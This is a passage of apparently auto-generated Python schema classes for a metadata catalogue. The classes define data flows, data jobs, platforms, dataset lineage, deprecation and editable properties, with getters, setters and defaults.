"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Edited documentation of the dashboard"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Edited documentation of the dashboard"""
self._inner_dict['description'] = value
class DataFlowInfoClass(DictWrapper):
"""Information about a Data processing flow"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.datajob.DataFlowInfo")
def __init__(self,
name: str,
customProperties: Optional[Dict[str, str]]=None,
externalUrl: Union[None, str]=None,
description: Union[None, str]=None,
project: Union[None, str]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.externalUrl = externalUrl
self.name = name
self.description = description
self.project = project
@classmethod
def construct_with_defaults(cls) -> "DataFlowInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.externalUrl = self.RECORD_SCHEMA.field_map["externalUrl"].default
self.name = str()
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.project = self.RECORD_SCHEMA.field_map["project"].default
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def externalUrl(self) -> Union[None, str]:
"""Getter: URL where the reference exist"""
return self._inner_dict.get('externalUrl') # type: ignore
@externalUrl.setter
def externalUrl(self, value: Union[None, str]) -> None:
"""Setter: URL where the reference exist"""
self._inner_dict['externalUrl'] = value
@property
def name(self) -> str:
"""Getter: Flow name"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Flow name"""
self._inner_dict['name'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Flow description"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Flow description"""
self._inner_dict['description'] = value
@property
def project(self) -> Union[None, str]:
"""Getter: Optional project/namespace associated with the flow"""
return self._inner_dict.get('project') # type: ignore
@project.setter
def project(self, value: Union[None, str]) -> None:
"""Setter: Optional project/namespace associated with the flow"""
self._inner_dict['project'] = value
class DataJobInfoClass(DictWrapper):
"""Information about a Data processing job"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.datajob.DataJobInfo")
def __init__(self,
name: str,
type: Union[Union[str, "AzkabanJobTypeClass"], str],
customProperties: Optional[Dict[str, str]]=None,
externalUrl: Union[None, str]=None,
description: Union[None, str]=None,
flowUrn: Union[None, str]=None,
status: Union[None, Union[str, "JobStatusClass"]]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.externalUrl = externalUrl
self.name = name
self.description = description
self.type = type
self.flowUrn = flowUrn
self.status = status
@classmethod
def construct_with_defaults(cls) -> "DataJobInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.externalUrl = self.RECORD_SCHEMA.field_map["externalUrl"].default
self.name = str()
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.type = AzkabanJobTypeClass.COMMAND
self.flowUrn = self.RECORD_SCHEMA.field_map["flowUrn"].default
self.status = self.RECORD_SCHEMA.field_map["status"].default
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def externalUrl(self) -> Union[None, str]:
"""Getter: URL where the reference exist"""
return self._inner_dict.get('externalUrl') # type: ignore
@externalUrl.setter
def externalUrl(self, value: Union[None, str]) -> None:
"""Setter: URL where the reference exist"""
self._inner_dict['externalUrl'] = value
@property
def name(self) -> str:
"""Getter: Job name"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Job name"""
self._inner_dict['name'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Job description"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Job description"""
self._inner_dict['description'] = value
@property
def type(self) -> Union[Union[str, "AzkabanJobTypeClass"], str]:
"""Getter: Datajob type
**NOTE**: AzkabanJobType is deprecated. Please use strings instead."""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[Union[str, "AzkabanJobTypeClass"], str]) -> None:
"""Setter: Datajob type
**NOTE**: AzkabanJobType is deprecated. Please use strings instead."""
self._inner_dict['type'] = value
@property
def flowUrn(self) -> Union[None, str]:
"""Getter: DataFlow urn that this job is part of"""
return self._inner_dict.get('flowUrn') # type: ignore
@flowUrn.setter
def flowUrn(self, value: Union[None, str]) -> None:
"""Setter: DataFlow urn that this job is part of"""
self._inner_dict['flowUrn'] = value
@property
def status(self) -> Union[None, Union[str, "JobStatusClass"]]:
"""Getter: Status of the job"""
return self._inner_dict.get('status') # type: ignore
@status.setter
def status(self, value: Union[None, Union[str, "JobStatusClass"]]) -> None:
"""Setter: Status of the job"""
self._inner_dict['status'] = value
class DataJobInputOutputClass(DictWrapper):
"""Information about the inputs and outputs of a Data processing job"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.datajob.DataJobInputOutput")
def __init__(self,
inputDatasets: List[str],
outputDatasets: List[str],
inputDatajobs: Union[None, List[str]]=None,
):
super().__init__()
self.inputDatasets = inputDatasets
self.outputDatasets = outputDatasets
self.inputDatajobs = inputDatajobs
@classmethod
def construct_with_defaults(cls) -> "DataJobInputOutputClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.inputDatasets = list()
self.outputDatasets = list()
self.inputDatajobs = self.RECORD_SCHEMA.field_map["inputDatajobs"].default
@property
def inputDatasets(self) -> List[str]:
"""Getter: Input datasets consumed by the data job during processing"""
return self._inner_dict.get('inputDatasets') # type: ignore
@inputDatasets.setter
def inputDatasets(self, value: List[str]) -> None:
"""Setter: Input datasets consumed by the data job during processing"""
self._inner_dict['inputDatasets'] = value
@property
def outputDatasets(self) -> List[str]:
"""Getter: Output datasets produced by the data job during processing"""
return self._inner_dict.get('outputDatasets') # type: ignore
@outputDatasets.setter
def outputDatasets(self, value: List[str]) -> None:
"""Setter: Output datasets produced by the data job during processing"""
self._inner_dict['outputDatasets'] = value
@property
def inputDatajobs(self) -> Union[None, List[str]]:
"""Getter: Input datajobs that this data job depends on"""
return self._inner_dict.get('inputDatajobs') # type: ignore
@inputDatajobs.setter
def inputDatajobs(self, value: Union[None, List[str]]) -> None:
"""Setter: Input datajobs that this data job depends on"""
self._inner_dict['inputDatajobs'] = value
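# Illustrative usage only (not part of the generated schema): wiring up job
# lineage with hypothetical dataset and data-job urns.
#
#   lineage = DataJobInputOutputClass(
#       inputDatasets=["urn:li:dataset:(urn:li:dataPlatform:hive,db.events,PROD)"],
#       outputDatasets=["urn:li:dataset:(urn:li:dataPlatform:hive,db.events_agg,PROD)"],
#   )
#   lineage.inputDatajobs = ["urn:li:dataJob:(urn:li:dataFlow:(airflow,etl,prod),upstream_task)"]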
class EditableDataFlowPropertiesClass(DictWrapper):
"""Stores editable changes made to properties. This separates changes made from
ingestion pipelines and edits in the UI to avoid accidental overwrites of user-provided data by ingestion pipelines"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.datajob.EditableDataFlowProperties")
def __init__(self,
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
description: Union[None, str]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.description = description
@classmethod
def construct_with_defaults(cls) -> "EditableDataFlowPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Edited documentation of the data flow"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Edited documentation of the data flow"""
self._inner_dict['description'] = value
class EditableDataJobPropertiesClass(DictWrapper):
"""Stores editable changes made to properties. This separates changes made from
ingestion pipelines and edits in the UI to avoid accidental overwrites of user-provided data by ingestion pipelines"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.datajob.EditableDataJobProperties")
def __init__(self,
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
description: Union[None, str]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.description = description
@classmethod
def construct_with_defaults(cls) -> "EditableDataJobPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Edited documentation of the data job """
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Edited documentation of the data job """
self._inner_dict['description'] = value
class JobStatusClass(object):
"""Job statuses"""
"""Jobs being initialized."""
STARTING = "STARTING"
"""Jobs currently running."""
IN_PROGRESS = "IN_PROGRESS"
"""Jobs being stopped."""
STOPPING = "STOPPING"
"""Jobs that have stopped."""
STOPPED = "STOPPED"
"""Jobs with successful completion."""
COMPLETED = "COMPLETED"
"""Jobs that have failed."""
FAILED = "FAILED"
"""Jobs with unknown status (either unmappable or unavailable)"""
UNKNOWN = "UNKNOWN"
class AzkabanJobTypeClass(object):
"""The various types of support azkaban jobs"""
"""The command job type is one of the basic built-in types. It runs multiple UNIX commands using java processbuilder.
Upon execution, Azkaban spawns off a process to run the command."""
COMMAND = "COMMAND"
"""Runs a java program with ability to access Hadoop cluster.
https://azkaban.readthedocs.io/en/latest/jobTypes.html#java-job-type"""
HADOOP_JAVA = "HADOOP_JAVA"
"""In large part, this is the same Command type. The difference is its ability to talk to a Hadoop cluster
securely, via Hadoop tokens."""
HADOOP_SHELL = "HADOOP_SHELL"
"""Hive type is for running Hive jobs."""
HIVE = "HIVE"
"""Pig type is for running Pig jobs."""
PIG = "PIG"
"""SQL is for running Presto, mysql queries etc"""
SQL = "SQL"
"""Glue type is for running AWS Glue job transforms."""
GLUE = "GLUE"
class DataPlatformInfoClass(DictWrapper):
"""Information about a data platform"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataplatform.DataPlatformInfo")
def __init__(self,
name: str,
type: Union[str, "PlatformTypeClass"],
datasetNameDelimiter: str,
displayName: Union[None, str]=None,
logoUrl: Union[None, str]=None,
):
super().__init__()
self.name = name
self.displayName = displayName
self.type = type
self.datasetNameDelimiter = datasetNameDelimiter
self.logoUrl = logoUrl
@classmethod
def construct_with_defaults(cls) -> "DataPlatformInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
self.displayName = self.RECORD_SCHEMA.field_map["displayName"].default
self.type = PlatformTypeClass.FILE_SYSTEM
self.datasetNameDelimiter = str()
self.logoUrl = self.RECORD_SCHEMA.field_map["logoUrl"].default
@property
def name(self) -> str:
"""Getter: Name of the data platform"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Name of the data platform"""
self._inner_dict['name'] = value
@property
def displayName(self) -> Union[None, str]:
"""Getter: The name that will be used for displaying a platform type."""
return self._inner_dict.get('displayName') # type: ignore
@displayName.setter
def displayName(self, value: Union[None, str]) -> None:
"""Setter: The name that will be used for displaying a platform type."""
self._inner_dict['displayName'] = value
@property
def type(self) -> Union[str, "PlatformTypeClass"]:
"""Getter: Platform type this data platform describes"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "PlatformTypeClass"]) -> None:
"""Setter: Platform type this data platform describes"""
self._inner_dict['type'] = value
@property
def datasetNameDelimiter(self) -> str:
"""Getter: The delimiter in the dataset names on the data platform, e.g. '/' for HDFS and '.' for Oracle"""
return self._inner_dict.get('datasetNameDelimiter') # type: ignore
@datasetNameDelimiter.setter
def datasetNameDelimiter(self, value: str) -> None:
"""Setter: The delimiter in the dataset names on the data platform, e.g. '/' for HDFS and '.' for Oracle"""
self._inner_dict['datasetNameDelimiter'] = value
@property
def logoUrl(self) -> Union[None, str]:
"""Getter: The URL for a logo associated with the platform"""
return self._inner_dict.get('logoUrl') # type: ignore
@logoUrl.setter
def logoUrl(self, value: Union[None, str]) -> None:
"""Setter: The URL for a logo associated with the platform"""
self._inner_dict['logoUrl'] = value
class PlatformTypeClass(object):
"""Platform types available at LinkedIn"""
"""Value for a file system, e.g. hdfs"""
FILE_SYSTEM = "FILE_SYSTEM"
"""Value for a key value store, e.g. espresso, voldemort"""
KEY_VALUE_STORE = "KEY_VALUE_STORE"
"""Value for a message broker, e.g. kafka"""
MESSAGE_BROKER = "MESSAGE_BROKER"
"""Value for an object store, e.g. ambry"""
OBJECT_STORE = "OBJECT_STORE"
"""Value for an OLAP datastore, e.g. pinot"""
OLAP_DATASTORE = "OLAP_DATASTORE"
"""Value for other platforms, e.g salesforce, dovetail"""
OTHERS = "OTHERS"
"""Value for a query engine, e.g. presto"""
QUERY_ENGINE = "QUERY_ENGINE"
"""Value for a relational database, e.g. oracle, mysql"""
RELATIONAL_DB = "RELATIONAL_DB"
"""Value for a search engine, e.g seas"""
SEARCH_ENGINE = "SEARCH_ENGINE"
class DataProcessInfoClass(DictWrapper):
"""The inputs and outputs of this data process"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataprocess.DataProcessInfo")
def __init__(self,
inputs: Union[None, List[str]]=None,
outputs: Union[None, List[str]]=None,
):
super().__init__()
self.inputs = inputs
self.outputs = outputs
@classmethod
def construct_with_defaults(cls) -> "DataProcessInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.inputs = self.RECORD_SCHEMA.field_map["inputs"].default
self.outputs = self.RECORD_SCHEMA.field_map["outputs"].default
@property
def inputs(self) -> Union[None, List[str]]:
"""Getter: the inputs of the data process"""
return self._inner_dict.get('inputs') # type: ignore
@inputs.setter
def inputs(self, value: Union[None, List[str]]) -> None:
"""Setter: the inputs of the data process"""
self._inner_dict['inputs'] = value
@property
def outputs(self) -> Union[None, List[str]]:
"""Getter: the outputs of the data process"""
return self._inner_dict.get('outputs') # type: ignore
@outputs.setter
def outputs(self, value: Union[None, List[str]]) -> None:
"""Setter: the outputs of the data process"""
self._inner_dict['outputs'] = value
class DatasetDeprecationClass(DictWrapper):
"""Dataset deprecation status"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.DatasetDeprecation")
def __init__(self,
deprecated: bool,
note: str,
decommissionTime: Union[None, int]=None,
actor: Union[None, str]=None,
):
super().__init__()
self.deprecated = deprecated
self.decommissionTime = decommissionTime
self.note = note
self.actor = actor
@classmethod
def construct_with_defaults(cls) -> "DatasetDeprecationClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.deprecated = bool()
self.decommissionTime = self.RECORD_SCHEMA.field_map["decommissionTime"].default
self.note = str()
self.actor = self.RECORD_SCHEMA.field_map["actor"].default
@property
def deprecated(self) -> bool:
"""Getter: Whether the dataset is deprecated by owner."""
return self._inner_dict.get('deprecated') # type: ignore
@deprecated.setter
def deprecated(self, value: bool) -> None:
"""Setter: Whether the dataset is deprecated by owner."""
self._inner_dict['deprecated'] = value
@property
def decommissionTime(self) -> Union[None, int]:
"""Getter: The time user plan to decommission this dataset."""
return self._inner_dict.get('decommissionTime') # type: ignore
@decommissionTime.setter
def decommissionTime(self, value: Union[None, int]) -> None:
"""Setter: The time user plan to decommission this dataset."""
self._inner_dict['decommissionTime'] = value
@property
def note(self) -> str:
"""Getter: Additional information about the dataset deprecation plan, such as the wiki, doc, RB."""
return self._inner_dict.get('note') # type: ignore
@note.setter
def note(self, value: str) -> None:
"""Setter: Additional information about the dataset deprecation plan, such as the wiki, doc, RB."""
self._inner_dict['note'] = value
@property
def actor(self) -> Union[None, str]:
"""Getter: The corpuser URN which will be credited for modifying this deprecation content."""
return self._inner_dict.get('actor') # type: ignore
@actor.setter
def actor(self, value: Union[None, str]) -> None:
"""Setter: The corpuser URN which will be credited for modifying this deprecation content."""
self._inner_dict['actor'] = value
class DatasetFieldMappingClass(DictWrapper):
"""Representation of mapping between fields in source dataset to the field in destination dataset"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.DatasetFieldMapping")
def __init__(self,
created: "AuditStampClass",
transformation: Union[Union[str, "TransformationTypeClass"], "UDFTransformerClass"],
sourceFields: List[str],
destinationField: str,
):
super().__init__()
self.created = created
self.transformation = transformation
self.sourceFields = sourceFields
self.destinationField = destinationField
@classmethod
def construct_with_defaults(cls) -> "DatasetFieldMappingClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = AuditStampClass.construct_with_defaults()
self.transformation = TransformationTypeClass.BLACKBOX
self.sourceFields = list()
self.destinationField = str()
@property
def created(self) -> "AuditStampClass":
"""Getter: Audit stamp containing who reported the field mapping and when"""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: Audit stamp containing who reported the field mapping and when"""
self._inner_dict['created'] = value
@property
def transformation(self) -> Union[Union[str, "TransformationTypeClass"], "UDFTransformerClass"]:
"""Getter: Transfomration function between the fields involved"""
return self._inner_dict.get('transformation') # type: ignore
@transformation.setter
def transformation(self, value: Union[Union[str, "TransformationTypeClass"], "UDFTransformerClass"]) -> None:
"""Setter: Transfomration function between the fields involved"""
self._inner_dict['transformation'] = value
@property
def sourceFields(self) -> List[str]:
"""Getter: Source fields from which the fine grained lineage is derived"""
return self._inner_dict.get('sourceFields') # type: ignore
@sourceFields.setter
def sourceFields(self, value: List[str]) -> None:
"""Setter: Source fields from which the fine grained lineage is derived"""
self._inner_dict['sourceFields'] = value
@property
def destinationField(self) -> str:
"""Getter: Destination field which is derived from source fields"""
return self._inner_dict.get('destinationField') # type: ignore
@destinationField.setter
def destinationField(self, value: str) -> None:
"""Setter: Destination field which is derived from source fields"""
self._inner_dict['destinationField'] = value
class DatasetLineageTypeClass(object):
"""The various types of supported dataset lineage"""
"""Direct copy without modification"""
COPY = "COPY"
"""Transformed data with modification (format or content change)"""
TRANSFORMED = "TRANSFORMED"
"""Represents a view defined on the sources e.g. Hive view defined on underlying hive tables or a Hive table pointing to a HDFS dataset or DALI view defined on multiple sources"""
VIEW = "VIEW"
class DatasetPropertiesClass(DictWrapper):
"""Properties associated with a Dataset"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.DatasetProperties")
def __init__(self,
customProperties: Optional[Dict[str, str]]=None,
externalUrl: Union[None, str]=None,
description: Union[None, str]=None,
uri: Union[None, str]=None,
tags: Optional[List[str]]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.externalUrl = externalUrl
self.description = description
self.uri = uri
if tags is None:
# default: []
self.tags = list()
else:
self.tags = tags
@classmethod
def construct_with_defaults(cls) -> "DatasetPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.externalUrl = self.RECORD_SCHEMA.field_map["externalUrl"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.uri = self.RECORD_SCHEMA.field_map["uri"].default
self.tags = list()
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def externalUrl(self) -> Union[None, str]:
"""Getter: URL where the reference exist"""
return self._inner_dict.get('externalUrl') # type: ignore
@externalUrl.setter
def externalUrl(self, value: Union[None, str]) -> None:
"""Setter: URL where the reference exist"""
self._inner_dict['externalUrl'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the dataset"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the dataset"""
self._inner_dict['description'] = value
@property
def uri(self) -> Union[None, str]:
"""Getter: The abstracted URI such as hdfs:///data/tracking/PageViewEvent, file:///dir/file_name. Uri should not include any environment specific properties. Some datasets might not have a standardized uri, which makes this field optional (i.e. kafka topic)."""
return self._inner_dict.get('uri') # type: ignore
@uri.setter
def uri(self, value: Union[None, str]) -> None:
"""Setter: The abstracted URI such as hdfs:///data/tracking/PageViewEvent, file:///dir/file_name. Uri should not include any environment specific properties. Some datasets might not have a standardized uri, which makes this field optional (i.e. kafka topic)."""
self._inner_dict['uri'] = value
@property
def tags(self) -> List[str]:
"""Getter: [Legacy] Unstructured tags for the dataset. Structured tags can be applied via the `GlobalTags` aspect."""
return self._inner_dict.get('tags') # type: ignore
@tags.setter
def tags(self, value: List[str]) -> None:
"""Setter: [Legacy] Unstructured tags for the dataset. Structured tags can be applied via the `GlobalTags` aspect."""
self._inner_dict['tags'] = value
class DatasetUpstreamLineageClass(DictWrapper):
"""Fine Grained upstream lineage for fields in a dataset"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.DatasetUpstreamLineage")
def __init__(self,
fieldMappings: List["DatasetFieldMappingClass"],
):
super().__init__()
self.fieldMappings = fieldMappings
@classmethod
def construct_with_defaults(cls) -> "DatasetUpstreamLineageClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.fieldMappings = list()
@property
def fieldMappings(self) -> List["DatasetFieldMappingClass"]:
"""Getter: Upstream to downstream field level lineage mappings"""
return self._inner_dict.get('fieldMappings') # type: ignore
@fieldMappings.setter
def fieldMappings(self, value: List["DatasetFieldMappingClass"]) -> None:
"""Setter: Upstream to downstream field level lineage mappings"""
self._inner_dict['fieldMappings'] = value
class EditableDatasetPropertiesClass(DictWrapper):
"""EditableDatasetProperties stores editable changes made to dataset properties. This separates changes made from
ingestion pipelines and edits in the UI to avoid accidental overwrites of user-provided data by ingestion pipelines"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.EditableDatasetProperties")
def __init__(self,
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
description: Union[None, str]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.description = description
@classmethod
def construct_with_defaults(cls) -> "EditableDatasetPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
